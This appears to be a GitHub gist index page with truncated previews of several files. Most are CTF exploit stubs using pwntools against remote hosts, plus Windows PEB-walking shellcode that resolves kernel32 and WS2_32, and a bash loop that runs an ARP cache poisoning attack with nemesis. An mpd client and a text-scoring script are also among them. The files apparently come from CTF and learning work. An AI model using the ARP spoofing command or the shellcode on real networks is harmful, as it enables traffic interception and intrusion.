This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
from pwn import * | |
#context.log_level = "DEBUG" | |
r = remote("localhost", 50216) | |
r = remote("52.198.183.186", 50216) | |
def doOpen(filename): | |
r.recvuntil("choice: ") | |
r.sendline("1") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
from Frame import * | |
from pwn import * | |
if len(sys.argv) > 1: | |
r = remote("54.178.214.211", 3573) | |
else: | |
r = remote("localhost", 4000) | |
def recvpage(t): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
import socket | |
import struct | |
import time | |
import telnetlib | |
p = lambda v: struct.pack("<Q", v) | |
u = lambda v: struct.unpack("<Q", v)[0] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
BITS 32 | |
; windows peb function finder | |
; most of this code taken from shell-storm | |
; and the shellcoder's handbook | |
global _start | |
Kernel32Hash equ 0x000d4e88 | |
WS2_32Hash equ 0x0003ab08 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import os | |
import array | |
import string | |
rSum =0 | |
chart = {"EeTtAaOoIiNn":5,"SsHhRrDdLlUu ":4,"CcMmFfWwYyPp":3,"VvBbGgKkJjQq":2,"XxZz":1} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
''' | |
mike_pizza | |
exploit for deepblue-500 | |
from boston key party | |
vulnerability: | |
* moving the queen piece leads to arbitrary write, however you cannot |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# mike_pizza | |
# a smart mpd client-server | |
# allows xmobar to get the song stats without having to constantly query the mpd server | |
from mpd import MPDClient | |
import threading | |
import time | |
songchanged = False |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# perform an arp cache poisoning attack with nemesis | |
# http://nemesis.sourceforge.net/ | |
[[ $1 = "-h" ]] && echo "usage: $0 <network_device> <attackers_mac> <ip_to_masquerade_as> <victim_ip>" && exit 0 | |
while true | |
do | |
nemesis arp -d $1 -H $2 -M ff:ff:ff:ff:ff:ff -h $2 -m ff:ff:ff:ff:ff:ff -S $3 -D $4 |